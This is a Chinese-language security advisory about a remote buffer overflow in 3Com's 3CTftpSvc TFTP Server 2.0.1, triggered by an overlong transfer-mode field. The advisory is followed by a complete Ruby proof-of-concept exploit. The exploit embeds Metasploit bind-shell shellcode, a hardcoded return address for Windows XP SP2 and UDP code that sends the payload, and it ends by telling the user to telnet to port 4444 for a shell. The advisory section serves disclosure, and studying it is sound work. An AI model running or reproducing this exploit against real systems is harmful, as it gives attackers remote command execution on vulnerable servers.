3Com TFTP超长传输模式字段远程缓冲区溢出漏洞

受影响系统： 3Com 3CTftpSvc TFTP Server 2.0.1 描述： -------------------------------------------------------------------------------- BUGTRAQ ID: 21301 3CTftpSvc是一款Windows 9x/NT/XP平台下的TFTP服务器，实现TFTPv2协议。 3CTftpSvc在处理超长畸形的请求时存在漏洞，远程攻击者可能利用此漏洞在服务器上执行任意指令。 3CTftpSvc TFTP服务器在处理传送给GET或PUT命令的超长传输模式（大于470字节）时存在缓冲区溢出。如果攻击者向服务器发送了特制报文请求的话就会触发这个漏洞，导致拒绝服务或执行任意指令。 <*来源：Liu Qixu （liuqx@nipc.org.cn） 链接：http://secunia.com/advisories/23113/ http://marc.theaimsgroup.com/?l=bugtraq&m=116465920720302&w=2 *> 建议： -------------------------------------------------------------------------------- 厂商补丁： 3Com ---- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://support.3com.com/software/utilities_for_windows_32_bit.htm

# 3comtftpd_xpsp2.rb # # Copyright (C) cthulhu # # # This is a poc intended to exploit the 3Com TFTP Service version 2.0.1 # long transporting mode buffer overflow under xp sp2 english # (Vulnerability discovered by Liu Qixu) # # Usage : # ruby 3comftpd_xpsp2.rb # Default port is 69 if not specified require ';socket'; # win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com sc1 = "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x02" sc1 += "\xaf\xbb\x16\x83\xeb\xfc\xe2\xf4\xfe\xc5\x50\x5b\xea\x56\x44\xe9" sc1 +="\xfd\xcf\x30\x7a\x26\x8b\x30\x53\x3e\x24\xc7\x13\x7a\xae\x54\x9d" sc1 +="\x4d\xb7\x30\x49\x22\xae\x50\x5f\x89\x9b\x30\x17\xec\x9e\x7b\x8f" sc1 +="\xae\x2b\x7b\x62\x05\x6e\x71\x1b\x03\x6d\x50\xe2\x39\xfb\x9f\x3e" sc1 +="\x77\x4a\x30\x49\x26\xae\x50\x70\x89\xa3\xf0\x9d\x5d\xb3\xba\xfd" sc1 +="\x01\x83\x30\x9f\x6e\x8b\xa7\x77\xc1\x9e\x60\x72\x89\xec\x8b\x9d" sc1 +="\x42\xa3\x30\x66\x1e\x02\x30\x56\x0a\xf1\xd3\x98\x4c\xa1\x57\x46" sc1 +="\xfd\x79\xdd\x45\x64\xc7\x88\x24\x6a\xd8\xc8\x24\x5d\xfb\x44\xc6" sc1 +="\x6a\x64\x56\xea\x39\xff\x44\xc0\x5d\x26\x5e\x70\x83\x42\xb3\x14" sc1 +="\x57\xc5\xb9\xe9\xd2\xc7\x62\x1f\xf7\x02\xec\xe9\xd4\xfc\xe8\x45" sc1 +="\x51\xfc\xf8\x45\x41\xfc\x44\xc6\x64\xc7\xaa\x4a\x64\xfc\x32\xf7" sc1 +="\x97\xc7\x1f\x0c\x72\x68\xec\xe9\xd4\xc5\xab\x47\x57\x50\x6b\x7e" sc1 +="\xa6\x02\x95\xff\x55\x50\x6d\x45\x57\x50\x6b\x7e\xe7\xe6\x3d\x5f" sc1 +="\x55\x50\x6d\x46\x56\xfb\xee\xe9\xd2\x3c\xd3\xf1\x7b\x69\xc2\x41" sc1 +="\xfd\x79\xee\xe9\xd2\xc9\xd1\x72\x64\xc7\xd8\x7b\x8b\x4a\xd1\x46" sc1 +="\x5b\x86\x77\x9f\xe5\xc5\xff\x9f\xe0\x9e\x7b\xe5\xa8\x51\xf9\x3b" sc1 +="\xfc\xed\x97\x85\x8f\xd5\x83\xbd\xa9\x04\xd3\x64\xfc\x1c\xad\xe9" sc1 +="\x77\xeb\x44\xc0\x59\xf8\xe9\x47\x53\xfe\xd1\x17\x53\xfe\xee\x47" sc1 +="\xfd\x7f\xd3\xbb\xdb\xaa\x75\x45\xfd\x79\xd1\xe9\xfd\x98\x44\xc6" sc1 +="\x89\xf8\x47\x95\xc6\xcb\x44\xc0\x50\x50\x6b\x7e\xf2\x25\xbf\x49" sc1 +="\x51\x50\x6d\xe9\xd2\xaf\xbb\x16" jmp = "\x63\x20\xdc\x77" # jmp esi user32.dll xp sp 2 english host = ARGV[0] port = 69 if ARGV[1] port = ARGV[1] end sock = UDPSocket.new() puts "[+]Trying to connect to #{host}" if (not sock.connect(host,port)) raise "Unable to connect to #{host}" end exploit = "\x00\x02" exploit += "a" exploit += "\x00" exploit += "\x90"* 129 exploit += sc1 exploit += jmp exploit += "\x00" puts "[+] Connected ... Sending exploit to victim" sock.send exploit,0 puts "[+] Exploit sended.. Now telnet on port 4444 for your shell"